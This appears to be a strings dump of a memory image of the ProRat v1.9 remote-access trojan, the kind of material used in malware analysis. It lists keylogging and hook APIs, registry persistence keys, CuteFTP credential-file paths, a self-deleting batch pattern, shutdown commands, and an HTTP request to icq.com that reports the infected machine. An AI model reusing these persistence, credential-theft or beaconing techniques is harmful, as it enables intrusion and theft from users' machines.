@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
KeyPreview
220 Welcom to ProRat_Ftp_Server.
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc
KERNEL32.DLL
ADVAPI32.DLL
AVICAP32.DLL
COMCTL32.DLL
GDI32.DLL
OLE32.DLL
OLEAUT32.DLL
SHELL32.DLL
URLMON.DLL
WINMM.DLL
WINSPOOL.DRV
WS2_32.DLL
WSOCK32.DLL

services.exe_1276_rwx_00401000_001F6000:




Portl
LocalPortl
PeerPortl
SocksPortl
SocksPassword`
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpServerException\
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpExceptionD
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbort
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset4
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient`
TCustomSmtpClient(
TSmtpCli
OnProcessHeader
TSyncSmtpCli
TSyncSmtpCliT
smtp
SMTP component not ready
Uhh%D
SMTP component not connected
SMTP component already connected
426 Operation aborted.
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswert_D
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTMx`D
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
TFtpCtrlSocketxaD
FtpStatel
PassWord
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress@
OnKeyUp
windows
AutoHotkeys
:].tJ
EInvalidGraphicOperation
UhY%F
KeyPreviewx8E
WindowState
ssHotTrack
TWindowState
poProportional
TWMKey
Uh.oF
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
Uh.EG
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.rsrc
.reloc
.aspack
.adata
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
dW%xSJ"
mfc42.dll
msvcrt.dll
.HookSec
B[ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey]
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
GetCPInfo
TESTDLL.dll
4 4$4(4,4044484
6 6$6(6,6
CRTZFUKL,GZG
LTCPAJ34,GZG
151.164.23.201
151.164.1.8
212.101.97.7
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Port
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=17961¶ms_count=0&nick_name=ProRat Server&user_email=
@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=36&y=10 HTTP/1.1
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_17961.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: VVV.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
VVV.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
ProRat@Yahoo.Com
<ProRat@Yahoo.Com>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
C:\Windows\
Cv=kAv.SCv
Dv}.Bv
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
